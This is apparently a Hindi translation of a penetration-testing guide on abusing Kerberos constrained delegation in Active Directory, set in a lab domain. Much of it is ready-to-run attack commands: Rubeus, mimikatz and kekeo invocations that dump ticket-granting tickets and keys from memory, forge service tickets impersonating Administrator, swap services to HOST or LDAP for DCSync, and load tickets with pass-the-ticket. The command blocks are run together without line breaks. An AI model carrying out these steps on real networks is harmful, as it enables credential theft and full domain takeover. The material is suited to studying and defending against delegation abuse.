इसका उपयोग करते हुए एक डोमेन व्यवस्थापक अनुमति दे सकता है कि एक कंप्यूटर एक उपयोगकर्ता या कंप्यूटर का अनुकरण करे किसी मशीन की सेवा के खिलाफ।
उपयोगकर्ता के लिए सेवा स्वयं (S4U2self): यदि एक सेवा खाता का userAccountControl मान TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D) को शामिल करता है, तो यह किसी अन्य उपयोगकर्ता की ओर से अपने लिए (सेवा) एक TGS प्राप्त कर सकता है।
उपयोगकर्ता के लिए प्रॉक्सी सेवा(S4U2proxy): एक सेवा खाता किसी उपयोगकर्ता की ओर से msDS-AllowedToDelegateTo में सेट की गई सेवा के लिए एक TGS प्राप्त कर सकता है। ऐसा करने के लिए, इसे पहले उस उपयोगकर्ता से अपने लिए एक TGS की आवश्यकता होती है, लेकिन यह उस अन्य TGS को अनुरोध करने से पहले S4U2self का उपयोग करके उस TGS को प्राप्त कर सकता है।
नोट: यदि एक उपयोगकर्ता को AD में ‘खाता संवेदनशील है और इसे प्रतिनिधित्व नहीं किया जा सकता’ के रूप में चिह्नित किया गया है, तो आप उनका अनुकरण नहीं कर पाएंगे।
इसका मतलब है कि यदि आप सेवा का हैश समझौता करते हैं तो आप उपयोगकर्ताओं का अनुकरण कर सकते हैं और उनके नाम पर सेवा पर पहुँच प्राप्त कर सकते हैं (संभव privesc)।
इसके अलावा, आपके पास केवल उस सेवा तक पहुँच नहीं होगी जिसे उपयोगकर्ता अनुकरण कर सकता है, बल्कि किसी भी सेवा तक भी पहुँच होगी क्योंकि SPN (अनुरोधित सेवा नाम) की जांच नहीं की जा रही है, केवल विशेषाधिकार। इसलिए, यदि आपके पास CIFS सेवा तक पहुँच है तो आप Rubeus में /altservice ध्वज का उपयोग करके HOST सेवा तक भी पहुँच प्राप्त कर सकते हैं।
इसके अलावा, DC पर LDAP सेवा पहुँच, एक DCSync का शोषण करने के लिए आवश्यक है।
# The first step is to get a TGT of the service that can impersonate others## If you are SYSTEM in the server, you might take it from memory.\Rubeus.exetriage.\Rubeus.exedump/luid:0x3e4/service:krbtgt/nowrap# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one## Get AES/RC4 with mimikatzmimikatzsekurlsa::ekeys## Request with aestgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05.\Rubeus.exeasktgt/user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05/opsec/nowrap# Request with RC4tgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d.\Rubeus.exeasktgt/user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f/outfile:TGT_websvc.kirbi
TGT टिकट या RC4 या AES256 प्राप्त करने के अन्य तरीके हैं बिना कंप्यूटर में SYSTEM बने जैसे कि प्रिंटर बग और अनकंस्ट्रेन डेलीगेशन, NTLM रिलेइंग और एक्टिव डायरेक्टरी सर्टिफिकेट सर्विस का दुरुपयोग
बस उस TGT टिकट (या हैश) के साथ आप इस हमले को बिना पूरे कंप्यूटर को समझौता किए कर सकते हैं।
Using Rubeus
#Obtain a TGS of the Administrator user to self.\Rubeus.exes4u/ticket:TGT_websvc.kirbi/impersonateuser:Administrator/outfile:TGS_administrator#Obtain service TGS impersonating Administrator (CIFS).\Rubeus.exes4u/ticket:TGT_websvc.kirbi/tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL/msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local"/outfile:TGS_administrator_CIFS#Impersonate Administrator on different service (HOST).\Rubeus.exes4u/ticket:TGT_websvc.kirbi/tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL/msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local"/altservice:HOST/outfile:TGS_administrator_HOST# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2).\Rubeus.exes4u/impersonateuser:Administrator/msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local"/user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi/nowrap#Load ticket in memory.\Rubeus.exeptt/ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
kekeo + Mimikatz
#Obtain a TGT for the Constained allowed usertgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)tgs::s4u/tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi/user:Administrator@dollarcorp.moneycorp.local/service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL#Load the TGS in memoryInvoke-Mimikatz-Command'"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'